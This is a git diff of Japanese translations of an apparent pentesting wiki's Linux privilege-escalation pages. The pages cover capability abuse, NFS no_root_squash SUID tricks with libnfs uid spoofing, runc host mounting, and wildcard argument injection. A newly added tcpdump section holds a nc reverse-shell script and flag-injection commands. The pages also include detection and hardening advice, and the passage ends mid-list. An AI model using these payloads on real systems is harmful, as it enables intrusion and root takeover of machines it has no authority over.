CAP_SYS_RAWIO -[**CAP_SYS_RAWIO**](https://man7.org/linux/man-pages/man7/capabilities.7.html)は、`/dev/mem`、`/dev/kmem`、`/proc/kcore`へのアクセス、`mmap_min_addr`の変更、`ioperm(2)`および`iopl(2)`システムコールへのアクセス、さまざまなディスクコマンドを含む多くのセンシティブな操作を提供します。この能力を介して`FIBMAP ioctl(2)`も有効になっており、これは[過去に問題を引き起こした](http://lkml.iu.edu/hypermail/linux/kernel/9907.0/0132.html)ことがあります。マニュアルページによれば、これにより保持者は他のデバイスに対して**デバイス固有の操作を実行することができます**。 +[**CAP_SYS_RAWIO**](https://man7.org/linux/man-pages/man7/capabilities.7.html)は、`/dev/mem`、`/dev/kmem`、または`/proc/kcore`へのアクセス、`mmap_min_addr`の変更、`ioperm(2)`および`iopl(2)`システムコールへのアクセス、さまざまなディスクコマンドを含む多くのセンシティブな操作を提供します。この能力を介して`FIBMAP ioctl(2)`も有効になっており、[過去に問題を引き起こした](http://lkml.iu.edu/hypermail/linux/kernel/9907.0/0132.html)ことがあります。マニュアルページによれば、これにより保持者は他のデバイスに対して**デバイス固有の操作を実行する**ことができます。 -これは**特権昇格**や**Dockerブレイクアウト**に役立つ可能性があります。 +これは**特権昇格**や**Dockerブレイクアウト**に役立ちます。 ## CAP_KILL @@ -1276,7 +1276,7 @@ Permitted capabilitiesは使用できる能力を制限しているようです **バイナリの例** -**`python`**バイナリがこの能力を持っていると仮定しましょう。もし**サービスやソケットの設定**(またはサービスに関連する任意の設定ファイル)を変更できるなら、バックドアを仕掛け、そのサービスに関連するプロセスを終了させて、新しい設定ファイルがバックドアと共に実行されるのを待つことができます。 +**`python`**バイナリがこの能力を持っていると仮定しましょう。もし**サービスやソケットの設定**(またはサービスに関連する任意の設定ファイル)を変更できるなら、バックドアを仕掛け、そのサービスに関連するプロセスを終了させて、新しい設定ファイルがバックドアで実行されるのを待つことができます。 ```python #Use this python code to kill arbitrary processes import os @@ -1286,7 +1286,7 @@ os.killpg(pgid, signal.SIGKILL) ``` **Privesc with kill** -もしあなたが kill 権限を持っていて、**root として実行されている node プログラム**(または別のユーザーとして) がある場合、あなたはおそらく **SIGUSR1 シグナルを送信**して、それを **node デバッガーを開かせる**ことができ、そこに接続することができます。 +もしあなたがkill権限を持っていて、**rootとして実行されているnodeプログラム**(または別のユーザーとして)を見つけた場合、**SIGUSR1信号**を送信して、**nodeデバッガー**を開かせることができるかもしれません。 ```bash kill -s SIGUSR1 # After an URL to access the debugger will appear. e.g. ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d @@ -1295,14 +1295,13 @@ kill -s SIGUSR1 electron-cef-chromium-debugger-abuse.md {{#endref}} - ## CAP_NET_BIND_SERVICE -**これは、任意のポート(特権ポートを含む)でリッスンできることを意味します。** この能力を使って直接特権を昇格させることはできません。 +**これは、特権ポートを含む任意のポートでリッスンできることを意味します。** この能力を使って直接特権を昇格させることはできません。 **バイナリの例** -もし**`python`**がこの能力を持っていれば、任意のポートでリッスンでき、さらにそこから他のポートに接続することもできます(いくつかのサービスは特定の特権ポートからの接続を必要とします) +もし**`python`**がこの能力を持っていれば、任意のポートでリッスンでき、さらにそこから他のポートに接続することもできます(いくつかのサービスは特定の特権ポートからの接続を必要とします)。 {{#tabs}} {{#tab name="Listen"}} @@ -1330,7 +1329,7 @@ s.connect(('10.10.10.10',500)) ## CAP_NET_RAW -[**CAP_NET_RAW**](https://man7.org/linux/man-pages/man7/capabilities.7.html) 権限はプロセスが **RAW および PACKET ソケットを作成** することを許可し、任意のネットワークパケットを生成および送信できるようにします。これにより、パケットの偽装、トラフィックの注入、ネットワークアクセス制御の回避など、コンテナ化された環境におけるセキュリティリスクが生じる可能性があります。悪意のある行為者は、これを利用してコンテナのルーティングに干渉したり、特に適切なファイアウォール保護がない場合にホストのネットワークセキュリティを侵害する可能性があります。さらに、**CAP_NET_RAW** は、RAW ICMP リクエストを介して ping などの操作をサポートするために特権コンテナにとって重要です。 +[**CAP_NET_RAW**](https://man7.org/linux/man-pages/man7/capabilities.7.html) 権限は、プロセスが **RAW および PACKET ソケットを作成** できることを許可し、任意のネットワークパケットを生成および送信できるようにします。これにより、パケットの偽装、トラフィックの注入、ネットワークアクセス制御の回避など、コンテナ化された環境におけるセキュリティリスクが生じる可能性があります。悪意のある行為者は、これを利用してコンテナのルーティングに干渉したり、特に適切なファイアウォール保護がない場合にホストのネットワークセキュリティを侵害する可能性があります。さらに、**CAP_NET_RAW** は、RAW ICMP リクエストを介して ping などの操作をサポートするために特権コンテナにとって重要です。 **これは、トラフィックをスニッフィングすることが可能であることを意味します。** この権限を使用して直接特権を昇格させることはできません。 @@ -1391,11 +1390,11 @@ count=count+1 ``` ## CAP_NET_ADMIN + CAP_NET_RAW -[**CAP_NET_ADMIN**](https://man7.org/linux/man-pages/man7/capabilities.7.html) 権限は、保持者に **ネットワーク設定を変更する** 力を与えます。これには、ファイアウォール設定、ルーティングテーブル、ソケットの権限、および公開されたネットワーク名前空間内のネットワークインターフェース設定が含まれます。また、ネットワークインターフェースで **プロミスキャスモード** を有効にし、名前空間を越えたパケットスニッフィングを可能にします。 +[**CAP_NET_ADMIN**](https://man7.org/linux/man-pages/man7/capabilities.7.html) 権限は、保持者に **ネットワーク設定を変更する** 権限を付与します。これには、ファイアウォール設定、ルーティングテーブル、ソケットの権限、および公開されたネットワーク名前空間内のネットワークインターフェース設定が含まれます。また、ネットワークインターフェースで **プロミスキャスモード** を有効にし、名前空間を越えたパケットスニッフィングを可能にします。 **バイナリの例** -**pythonバイナリ** がこれらの権限を持っていると仮定しましょう。 +**python バイナリ** がこれらの権限を持っていると仮定しましょう。 ```python #Dump iptables filter table rules import iptc @@ -1436,7 +1435,7 @@ fcntl.ioctl(fd, FS_IOC_SETFLAGS, f) f=open("/path/to/file.sh",'a+') f.write('New content for the file\n') ``` -> [!NOTE] +> [!TIP] > 通常、この不変属性は次のように設定および削除されます: > > ```bash @@ -1457,32 +1456,32 @@ f.write('New content for the file\n') ## CAP_SYSLOG -[**CAP_SYSLOG**](https://man7.org/linux/man-pages/man7/capabilities.7.html) は、Linux 2.6.37 でより広範な **CAP_SYS_ADMIN** から分離され、`syslog(2)` コールを使用する能力を特に付与しました。この機能により、`kptr_restrict` 設定が 1 の場合に `/proc` や類似のインターフェースを介してカーネルアドレスを表示することが可能になります。Linux 2.6.39 以降、`kptr_restrict` のデフォルトは 0 であり、カーネルアドレスが公開されますが、多くのディストリビューションはセキュリティ上の理由からこれを 1(uid 0 以外からアドレスを隠す)または 2(常にアドレスを隠す)に設定しています。 +[**CAP_SYSLOG**](https://man7.org/linux/man-pages/man7/capabilities.7.html) は、Linux 2.6.37 でより広範な **CAP_SYS_ADMIN** から分離され、`syslog(2)` コールを使用する能力を特に付与しました。この機能により、`kptr_restrict` 設定が 1 のときに `/proc` や類似のインターフェースを介してカーネルアドレスを表示することが可能になります。Linux 2.6.39 以降、`kptr_restrict` のデフォルトは 0 であり、カーネルアドレスが公開されますが、多くのディストリビューションはセキュリティ上の理由からこれを 1(uid 0 以外からアドレスを隠す)または 2(常にアドレスを隠す)に設定しています。 -さらに、**CAP_SYSLOG** は、`dmesg_restrict` が 1 に設定されている場合に `dmesg` 出力にアクセスすることを許可します。これらの変更にもかかわらず、**CAP_SYS_ADMIN** は歴史的な前例により `syslog` 操作を実行する能力を保持しています。 +さらに、**CAP_SYSLOG** は、`dmesg_restrict` が 1 に設定されているときに `dmesg` 出力にアクセスすることを許可します。これらの変更にもかかわらず、**CAP_SYS_ADMIN** は歴史的な前例により `syslog` 操作を実行する能力を保持しています。 ## CAP_MKNOD [**CAP_MKNOD**](https://man7.org/linux/man-pages/man7/capabilities.7.html) は、通常のファイル、FIFO(名前付きパイプ)、または UNIX ドメインソケットの作成を超えて `mknod` システムコールの機能を拡張します。特に、次のような特別なファイルの作成を許可します: -- **S_IFCHR**: 端末のようなキャラクタ特殊ファイル。 -- **S_IFBLK**: ディスクのようなブロック特殊ファイル。 +- **S_IFCHR**: 端末のようなデバイスであるキャラクタ特殊ファイル。 +- **S_IFBLK**: ディスクのようなデバイスであるブロック特殊ファイル。 -この機能は、デバイスファイルを作成する能力を必要とするプロセスにとって不可欠であり、キャラクタまたはブロックデバイスを介してハードウェアとの直接的な相互作用を促進します。 +この機能は、デバイスファイルを作成する能力を必要とするプロセスにとって不可欠であり、キャラクタまたはブロックデバイスを介して直接ハードウェアと対話することを容易にします。 -これはデフォルトの docker 機能です ([https://github.com/moby/moby/blob/master/oci/caps/defaults.go#L6-L19](https://github.com/moby/moby/blob/master/oci/caps/defaults.go#L6-L19))。 +これはデフォルトの Docker 機能です ([https://github.com/moby/moby/blob/master/oci/caps/defaults.go#L6-L19](https://github.com/moby/moby/blob/master/oci/caps/defaults.go#L6-L19))。 この機能は、次の条件下でホスト上で特権昇格(フルディスク読み取りを通じて)を行うことを許可します: -1. ホストへの初期アクセスを持つ(特権なし)。 -2. コンテナへの初期アクセスを持つ(特権あり(EUID 0)、および有効な `CAP_MKNOD`)。 +1. ホストへの初期アクセスを持っている(特権なし)。 +2. コンテナへの初期アクセスを持っている(特権あり(EUID 0)、および有効な `CAP_MKNOD`)。 3. ホストとコンテナは同じユーザー名前空間を共有する必要があります。 **コンテナ内でブロックデバイスを作成およびアクセスする手順:** 1. **ホスト上で標準ユーザーとして:** -- `id` で現在のユーザーIDを確認します。例:`uid=1000(standarduser)`。 +- `id` で現在のユーザー ID を確認します。例:`uid=1000(standarduser)`。 - 対象デバイスを特定します。例:`/dev/sdb`。 2. **コンテナ内で `root` として:** @@ -1505,25 +1504,25 @@ ps aux | grep -i container_name | grep -i standarduser # Access the container's filesystem and the special block device head /proc/12345/root/dev/sdb ``` -このアプローチにより、標準ユーザーはコンテナを通じて `/dev/sdb` へのアクセスとデータの読み取りが可能になり、共有ユーザー名前空間とデバイスに設定された権限を利用します。 +このアプローチにより、標準ユーザーはコンテナを通じて `/dev/sdb` にアクセスし、データを読み取る可能性があります。これは、共有ユーザー名前空間とデバイスに設定された権限を利用しています。 ### CAP_SETPCAP -**CAP_SETPCAP** は、プロセスが他のプロセスの **能力セットを変更する** ことを可能にし、効果的、継承可能、許可されたセットからの能力の追加または削除を許可します。ただし、プロセスは自分の許可されたセットに存在する能力のみを変更できるため、他のプロセスの特権を自分のもの以上に引き上げることはできません。最近のカーネルの更新により、これらのルールが厳格化され、`CAP_SETPCAP` は自分自身またはその子孫の許可されたセット内の能力を減少させることのみを許可され、セキュリティリスクを軽減することを目的としています。使用するには、効果的なセットに `CAP_SETPCAP` を持ち、ターゲットの能力を許可されたセットに持つ必要があり、`capset()` を使用して変更を行います。これが `CAP_SETPCAP` の核心的な機能と制限を要約し、特権管理とセキュリティ強化におけるその役割を強調しています。 +**CAP_SETPCAP** は、プロセスが他のプロセスの **能力セットを変更する** ことを可能にし、効果的、継承可能、許可されたセットからの能力の追加または削除を許可します。ただし、プロセスは自分の許可されたセットに存在する能力のみを変更できるため、他のプロセスの特権を自分のもの以上に引き上げることはできません。最近のカーネルの更新により、これらのルールが厳格化され、`CAP_SETPCAP` は自分自身またはその子孫の許可されたセット内の能力を減少させることのみを許可するよう制限されています。これは、セキュリティリスクを軽減することを目的としています。使用するには、効果的なセットに `CAP_SETPCAP` を持ち、ターゲットの能力を許可されたセットに持っている必要があり、`capset()` を使用して変更を行います。これが `CAP_SETPCAP` の核心的な機能と制限を要約しており、特権管理とセキュリティ強化におけるその役割を強調しています。 **`CAP_SETPCAP`** は、プロセスが他のプロセスの **能力セットを変更する** ことを可能にするLinuxの能力です。他のプロセスの効果的、継承可能、許可された能力セットから能力を追加または削除する能力を付与します。ただし、この能力の使用方法には特定の制限があります。 -`CAP_SETPCAP` を持つプロセスは **自分の許可された能力セットにある能力のみを付与または削除できる** ということです。言い換えれば、プロセスは自分が持っていない能力を他のプロセスに付与することはできません。この制限により、プロセスは他のプロセスの特権を自分の特権レベル以上に引き上げることができなくなります。 +`CAP_SETPCAP` を持つプロセスは、**自分の許可された能力セットにある能力のみを付与または削除できます**。言い換えれば、プロセスは自分が持っていない能力を他のプロセスに付与することはできません。この制限により、プロセスは他のプロセスの特権を自分の特権レベル以上に引き上げることができなくなります。 さらに、最近のカーネルバージョンでは、`CAP_SETPCAP` の能力が **さらに制限されました**。もはやプロセスが他のプロセスの能力セットを恣意的に変更することは許可されていません。代わりに、**自分の許可された能力セットまたはその子孫の許可された能力セット内の能力を下げることのみを許可します**。この変更は、能力に関連する潜在的なセキュリティリスクを減少させるために導入されました。 -`CAP_SETPCAP` を効果的に使用するには、効果的な能力セットにその能力を持ち、ターゲットの能力を許可された能力セットに持つ必要があります。その後、`capset()` システムコールを使用して他のプロセスの能力セットを変更できます。 +`CAP_SETPCAP` を効果的に使用するには、効果的な能力セットにその能力を持ち、ターゲットの能力を許可された能力セットに持っている必要があります。その後、`capset()` システムコールを使用して他のプロセスの能力セットを変更できます。 要約すると、`CAP_SETPCAP` はプロセスが他のプロセスの能力セットを変更することを可能にしますが、自分が持っていない能力を付与することはできません。さらに、セキュリティ上の懸念から、その機能は最近のカーネルバージョンで制限され、自分の許可された能力セットまたはその子孫の許可された能力セット内の能力を減少させることのみが許可されています。 -## 参考文献 +## References -**これらの例のほとんどは** [**https://attackdefense.pentesteracademy.com/**](https://attackdefense.pentesteracademy.com) **のいくつかのラボから取られたもので、これらの特権昇格技術を練習したい場合は、これらのラボをお勧めします。** +**これらの例のほとんどは** [**https://attackdefense.pentesteracademy.com/**](https://attackdefense.pentesteracademy.com) **のいくつかのラボから取られたものですので、これらの特権昇格技術を練習したい場合は、これらのラボをお勧めします。** **その他の参考文献**: diff --git a/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md b/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md index 587b46dc4..348d9e405 100644 --- a/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md +++ b/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md @@ -1,27 +1,29 @@ +# NFS No Root Squash Misconfiguration Privilege Escalation + {{#include ../../banners/hacktricks-training.md}} -# 基本情報の圧縮 +## Squashing Basic Info -NFSは通常(特にLinuxでは)、ファイルにアクセスするために接続しているクライアントによって示された`uid`と`gid`を信頼します(Kerberosが使用されていない場合)。ただし、サーバーで**この動作を変更する**ために設定できるいくつかの構成があります: +NFSは通常(特にLinuxでは)、ファイルにアクセスするために接続しているクライアントによって指定された`uid`と`gid`を信頼します(Kerberosが使用されていない場合)。しかし、サーバーで**この動作を変更する**ために設定できるいくつかの構成があります: -- **`all_squash`**: すべてのアクセスを圧縮し、すべてのユーザーとグループを**`nobody`**(65534 unsigned / -2 signed)にマッピングします。したがって、すべての人が`nobody`となり、ユーザーは使用されません。 -- **`root_squash`/`no_all_squash`**: これはLinuxのデフォルトであり、**uid 0(root)のアクセスのみを圧縮**します。したがって、任意の`UID`と`GID`は信頼されますが、`0`は`nobody`に圧縮されるため、rootの偽装は不可能です。 +- **`all_squash`**: すべてのアクセスを圧縮し、すべてのユーザーとグループを**`nobody`**(65534 unsigned / -2 signed)にマッピングします。したがって、誰もが`nobody`となり、ユーザーは使用されません。 +- **`root_squash`/`no_all_squash`**: これはLinuxのデフォルトであり、**uid 0(root)のアクセスのみを圧縮**します。したがって、`UID`と`GID`は信頼されますが、`0`は`nobody`に圧縮されるため、rootの偽装は不可能です。 - **`no_root_squash`**: この構成が有効になっている場合、rootユーザーさえも圧縮されません。これは、この構成でディレクトリをマウントすると、rootとしてアクセスできることを意味します。 -**/etc/exports**ファイルで、**no_root_squash**として構成されているディレクトリを見つけた場合、**クライアントとして**それに**アクセス**し、そのディレクトリの中に**ローカルの**マシンの**root**のように**書き込む**ことができます。 +**/etc/exports**ファイルで、**no_root_squash**として構成されているディレクトリを見つけた場合、**クライアント**としてそれに**アクセス**し、そのディレクトリの中に**ローカルの**マシンの**root**であるかのように**書き込む**ことができます。 -**NFS**に関する詳細情報は、以下を確認してください: +**NFS**に関する詳細情報は次を確認してください: {{#ref}} ../../network-services-pentesting/nfs-service-pentesting.md {{#endref}} -# 権限昇格 +## Privilege Escalation -## リモートエクスプロイト +### Remote Exploit オプション1:bashを使用して: -- **クライアントマシンでそのディレクトリをマウントし、**rootとして**マウントされたフォルダ内に**/bin/bash**バイナリをコピーし、**SUID**権限を与え、**被害者**マシンからそのbashバイナリを実行します。 +- **クライアントマシンでそのディレクトリをマウントし、**rootとして**マウントされたフォルダー内に**/bin/bash**バイナリをコピーし、**SUID**権限を与え、**被害者**マシンからそのbashバイナリを実行します。 - NFS共有内でrootになるためには、**`no_root_squash`**がサーバーで構成されている必要があります。 - ただし、有効になっていない場合は、バイナリをNFS共有にコピーし、昇格したいユーザーとしてSUID権限を与えることで、他のユーザーに昇格することができます。 ```bash @@ -37,7 +39,7 @@ cd ./bash -p #ROOT shell ``` Option 2 using c compiled code: -- **クライアントマシンでそのディレクトリをマウント**し、**ルートとして**マウントされたフォルダ内にSUID権限を悪用するコンパイル済みペイロードをコピーし、**SUID**権限を与え、**被害者**マシンからそのバイナリを**実行**します(ここにいくつかの[C SUIDペイロード](payloads-to-execute.md#c)があります)。 +- **クライアントマシンでそのディレクトリをマウント**し、**ルートとして**マウントされたフォルダ内にSUID権限を悪用するコンパイル済みペイロードをコピーし、それに**SUID**権限を与え、**被害者**マシンからそのバイナリを**実行**します(ここにいくつかの[C SUIDペイロード](payloads-to-execute.md#c)があります)。 - 前と同じ制限が適用されます。 ```bash #Attacker, as root user @@ -52,19 +54,19 @@ chmod +s payload cd ./payload #ROOT shell ``` -## ローカルエクスプロイト +### ローカルエクスプロイト -> [!NOTE] -> あなたのマシンから被害者のマシンへの**トンネルを作成できる場合、リモートバージョンを使用してこの特権昇格を悪用することができます**。\ -> 次のトリックは、ファイル`/etc/exports`が**IPを示している**場合に関するものです。この場合、**リモートエクスプロイトを使用することはできず**、**このトリックを悪用する必要があります**。\ -> エクスプロイトが機能するためのもう一つの要件は、**`/etc/export`内のエクスポートが`insecure`フラグを使用している必要がある**ことです。\ +> [!TIP] +> あなたのマシンから被害者のマシンへの**トンネルを作成できる場合、必要なポートをトンネリングしてこの特権昇格を悪用するためにリモートバージョンを使用することができます**。\ +> 次のトリックは、ファイル`/etc/exports`が**IPを示している場合**です。この場合、**リモートエクスプロイトを使用することはできず**、**このトリックを悪用する必要があります**。\ +> エクスプロイトが機能するためのもう一つの要件は、`/etc/export`内の**エクスポートが`insecure`フラグを使用している必要がある**ことです。\ > --_`/etc/export`がIPアドレスを示している場合、このトリックが機能するかどうかはわかりません_-- -## 基本情報 +### 基本情報 -このシナリオは、ローカルマシン上のマウントされたNFS共有を悪用し、クライアントがuid/gidを指定できるNFSv3仕様の欠陥を利用して、無許可のアクセスを可能にするものです。悪用には、NFS RPCコールの偽造を可能にするライブラリ[libnfs](https://github.com/sahlberg/libnfs)を使用します。 +このシナリオは、ローカルマシン上のマウントされたNFS共有を悪用し、クライアントが自分のuid/gidを指定できるNFSv3仕様の欠陥を利用して、無許可のアクセスを可能にします。悪用には、NFS RPC呼び出しの偽造を可能にするライブラリ[libnfs](https://github.com/sahlberg/libnfs)を使用します。 -### ライブラリのコンパイル +#### ライブラリのコンパイル ライブラリのコンパイル手順は、カーネルバージョンに基づいて調整が必要な場合があります。この特定のケースでは、fallocateシステムコールがコメントアウトされていました。コンパイルプロセスには、次のコマンドが含まれます: ```bash @@ -73,9 +75,9 @@ cd make gcc -fPIC -shared -o ld_nfs.so examples/ld_nfs.c -ldl -lnfs -I./include/ -L./lib/.libs/ ``` -### 攻撃の実行 +#### 攻撃の実行 -攻撃は、特権をルートに昇格させ、その後シェルを実行するシンプルなCプログラム(`pwn.c`)を作成することを含みます。プログラムはコンパイルされ、結果として得られたバイナリ(`a.out`)は、RPC呼び出しでuidを偽装するために`ld_nfs.so`を使用して、suid rootで共有に配置されます。 +攻撃は、特権をルートに昇格させ、その後シェルを実行するシンプルなCプログラム(`pwn.c`)を作成することを含みます。プログラムはコンパイルされ、結果として得られたバイナリ(`a.out`)は、RPC呼び出しでuidを偽装するために`ld_nfs.so`を使用して、suidルートで共有に配置されます。 1. **攻撃コードをコンパイルする:** ```bash @@ -95,9 +97,9 @@ LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod u+s nfs:/ /mnt/share/a.out #root ``` -## ボーナス: NFShellによるステルスファイルアクセス +### ボーナス: NFShellによるステルスファイルアクセス -rootアクセスが取得されると、所有権を変更せずにNFS共有と対話するために、Pythonスクリプト(nfsh.py)が使用されます。このスクリプトは、アクセスされるファイルのuidに一致するようにuidを調整し、権限の問題なしに共有上のファイルと対話できるようにします: +rootアクセスが取得されると、所有権を変更せずにNFS共有と対話するために、Pythonスクリプト(nfsh.py)が使用されます。このスクリプトは、アクセスされるファイルのuidに一致するように調整し、権限の問題なしに共有上のファイルと対話できるようにします: ```python #!/usr/bin/env python # script from https://www.errno.fr/nfs_privesc.html diff --git a/src/linux-hardening/privilege-escalation/runc-privilege-escalation.md b/src/linux-hardening/privilege-escalation/runc-privilege-escalation.md index 21c8dc243..80d835c41 100644 --- a/src/linux-hardening/privilege-escalation/runc-privilege-escalation.md +++ b/src/linux-hardening/privilege-escalation/runc-privilege-escalation.md @@ -4,7 +4,7 @@ ## 基本情報 -**runc**についてもっと知りたい場合は、以下のページを確認してください: +**runc** についてもっと知りたい場合は、以下のページを確認してください: {{#ref}} ../../network-services-pentesting/2375-pentesting-docker.md @@ -12,7 +12,7 @@ ## PE -ホストに`runc`がインストールされている場合、**ホストのルート/フォルダをマウントしたコンテナを実行できる可能性があります**。 +ホストに `runc` がインストールされている場合、**ホストのルート / フォルダーをマウントしたコンテナを実行できる可能性があります**。 ```bash runc -help #Get help and see if runc is intalled runc spec #This will create the config.json file in your current folder @@ -37,6 +37,6 @@ mkdir rootfs runc run demo ``` > [!CAUTION] -> これは常に機能するわけではありません。runcのデフォルトの動作はrootとして実行することなので、特権のないユーザーとして実行することは単純に機能しません(ルートレス構成がない限り)。ルートレス構成をデフォルトにすることは一般的には良いアイデアではありません。なぜなら、ルートレスコンテナ内には、ルートレスコンテナの外には適用されないいくつかの制限があるからです。 +> これは常に機能するわけではありません。runcのデフォルトの動作はrootとして実行することなので、特権のないユーザーとして実行することは単純に機能しません(rootless構成がない限り)。rootless構成をデフォルトにすることは一般的には良いアイデアではありません。なぜなら、rootlessコンテナ内にはrootlessコンテナの外には適用されない制限がいくつかあるからです。 {{#include ../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md b/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md index 3e172646a..c9dd162c9 100644 --- a/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md +++ b/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md @@ -1,14 +1,14 @@ -# Wildcards Spare Tricks +# ワイルドカードのスペアトリック {{#include ../../banners/hacktricks-training.md}} -> ワイルドカード(別名 *glob*)**引数インジェクション**は、特権スクリプトが `tar`、`chown`、`rsync`、`zip`、`7z` などのUnixバイナリを、引用符なしのワイルドカード `*` と共に実行する際に発生します。 +> ワイルドカード(別名 *glob*)**引数注入**は、特権スクリプトが `tar`、`chown`、`rsync`、`zip`、`7z` などのUnixバイナリを、引用符なしのワイルドカード `*` と共に実行する際に発生します。 > シェルはバイナリを実行する**前に**ワイルドカードを展開するため、作業ディレクトリにファイルを作成できる攻撃者は、`-` で始まるファイル名を作成することで、**データではなくオプション**として解釈されるようにし、任意のフラグやコマンドを効果的に密輸することができます。 > このページでは、2023-2025年の最も有用なプリミティブ、最近の研究、現代の検出方法を集めています。 ## chown / chmod -`--reference` フラグを悪用することで、**任意のファイルの所有者/グループまたはパーミッションビットをコピー**できます: +`--reference` フラグを悪用することで、**任意のファイルの所有者/グループまたは権限ビットをコピー**できます: ```bash # attacker-controlled directory touch "--reference=/root/secret``file" # ← filename becomes an argument @@ -21,7 +21,7 @@ chmod -R 644 *.php `--reference=/root/secret``file` が注入され、*すべての* 一致するファイルが `/root/secret``file` の所有権/権限を継承します。 *PoC & tool*: [`wildpwn`](https://github.com/localh0t/wildpwn) (複合攻撃)。 -詳細については、古典的な DefenseCode の論文を参照してください。 +詳細については、古典的な DefenseCode の論文も参照してください。 --- @@ -57,7 +57,7 @@ touch "--use-compress-program=/bin/sh" # attacker-controlled directory touch "-e sh shell.sh" # -e => use instead of ssh ``` -もしrootが後で`rsync -az * backup:/srv/`でディレクトリをアーカイブすると、注入されたフラグがリモート側でシェルを起動します。 +もしrootが後でディレクトリを`rsync -az * backup:/srv/`でアーカイブすると、注入されたフラグがリモート側でシェルを起動します。 *PoC*: [`wildpwn`](https://github.com/localh0t/wildpwn) (`rsync`モード)。 @@ -76,7 +76,7 @@ touch @root.txt # tells 7z to use root.txt as file list ```bash 7za a /backup/`date +%F`.7z -t7z -snl -- * ``` -7-Zipは`root.txt`(→ `/etc/shadow`)をファイルリストとして読み取ろうとし、**stderrに内容を出力します**。 +7-Zipは`root.txt`(→ `/etc/shadow`)をファイルリストとして読み取ろうとし、失敗し、**内容をstderrに出力します**。 --- @@ -86,11 +86,11 @@ touch @root.txt # tells 7z to use root.txt as file list ```bash zip result.zip files -T --unzip-command "sh -c id" ``` -Inject the flag via a crafted filename and wait for the privileged backup script to call `zip -T` (test archive) on the resulting file. +フラグを作成されたファイル名を介して注入し、特権バックアップスクリプトが結果のファイルに対して `zip -T`(アーカイブテスト)を呼び出すのを待ちます。 --- -## 追加のバイナリ:ワイルドカードインジェクションに脆弱なもの (2023-2025 クイックリスト) +## ワイルドカードインジェクションに脆弱な追加バイナリ(2023-2025年のクイックリスト) 以下のコマンドは、現代のCTFや実際の環境で悪用されています。ペイロードは常に、後でワイルドカードで処理される書き込み可能なディレクトリ内の*ファイル名*として作成されます: @@ -105,19 +105,64 @@ Inject the flag via a crafted filename and wait for the privileged backup script --- +## tcpdump回転フック(-G/-W/-z):ラッパー内のargvインジェクションによるRCE + +制限されたシェルまたはベンダーラッパーが、厳密な引用/検証なしにユーザー制御フィールド(例:「ファイル名」パラメータ)を連結して`tcpdump`コマンドラインを構築する場合、追加の`tcpdump`フラグを密輸できます。`-G`(時間ベースの回転)、`-W`(ファイル数の制限)、および`-z `(ポストローテートコマンド)の組み合わせは、tcpdumpを実行しているユーザー(通常は機器上のroot)として任意のコマンド実行をもたらします。 + +前提条件: + +- `tcpdump`に渡される`argv`に影響を与えることができる(例:`/debug/tcpdump --filter=... --file-name=`のようなラッパーを介して)。 +- ラッパーはファイル名フィールド内のスペースや`-`で始まるトークンをサニタイズしません。 + +クラシックPoC(書き込み可能なパスからリバースシェルスクリプトを実行): +```sh +# Reverse shell payload saved on the device (e.g., USB, tmpfs) +cat > /mnt/disk1_1/rce.sh <<'EOF' +#!/bin/sh +rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 4444 >/tmp/f +EOF +chmod +x /mnt/disk1_1/rce.sh + +# Inject additional tcpdump flags via the unsafe "file name" field +/debug/tcpdump --filter="udp port 1234" \ +--file-name="test -i any -W 1 -G 1 -z /mnt/disk1_1/rce.sh" + +# On the attacker host +nc -6 -lvnp 4444 & +# Then send any packet that matches the BPF to force a rotation +printf x | nc -u -6 [victim_ipv6] 1234 +``` +詳細: + +- `-G 1 -W 1` は、最初の一致するパケットの後に即座にローテートを強制します。 +- `-z ` は、ローテーションごとにポストローテートコマンドを1回実行します。多くのビルドは ` ` を実行します。 `` がスクリプト/インタープリタの場合、引数の処理がペイロードに一致することを確認してください。 + +ノンリムーバブルメディアのバリアント: + +- ファイルを書き込むための他のプリミティブ(例: 出力リダイレクションを許可する別のコマンドラッパー)がある場合、スクリプトを既知のパスにドロップし、プラットフォームのセマンティクスに応じて `-z /bin/sh /path/script.sh` または `-z /path/script.sh` をトリガーします。 +- 一部のベンダーラッパーは攻撃者が制御可能な場所にローテートします。ローテートされたパスに影響を与えることができれば(シンボリックリンク/ディレクトリトラバーサル)、`-z` を操作して外部メディアなしで完全に制御するコンテンツを実行できます。 + +ベンダー向けのハードニングのヒント: + +- 厳格なホワイトリストなしでユーザー制御の文字列を直接 `tcpdump`(または任意のツール)に渡さないでください。引用して検証してください。 +- ラッパーで `-z` 機能を公開しないでください; tcpdump を固定の安全なテンプレートで実行し、追加のフラグを完全に禁止します。 +- tcpdump の特権を削除する(cap_net_admin/cap_net_raw のみ)か、AppArmor/SELinux の制約の下で専用の特権のないユーザーとして実行します。 + ## 検出とハードニング 1. **重要なスクリプトでシェルグロビングを無効にする**: `set -f` (`set -o noglob`) はワイルドカードの展開を防ぎます。 -2. **引数を引用またはエスケープする**: `tar -czf "$dst" -- *` は*安全ではありません* — `find . -type f -print0 | xargs -0 tar -czf "$dst"`を好むべきです。 -3. **明示的なパス**: `*`の代わりに`/var/www/html/*.log`を使用して、攻撃者が`-`で始まる兄弟ファイルを作成できないようにします。 -4. **最小特権**: 可能な限り、バックアップ/メンテナンスジョブをrootではなく特権のないサービスアカウントとして実行します。 -5. **監視**: Elasticの事前構築されたルール*Potential Shell via Wildcard Injection*は、`tar --checkpoint=*`、`rsync -e*`、または`shell child process`に直後に続く`zip --unzip-command`を探します。EQLクエリは他のEDRに適応できます。 +2. **引数を引用またはエスケープする**: `tar -czf "$dst" -- *` は安全ではありません — `find . -type f -print0 | xargs -0 tar -czf "$dst"` を好みます。 +3. **明示的なパス**: `*` の代わりに `/var/www/html/*.log` を使用して、攻撃者が `-` で始まる兄弟ファイルを作成できないようにします。 +4. **最小特権**: 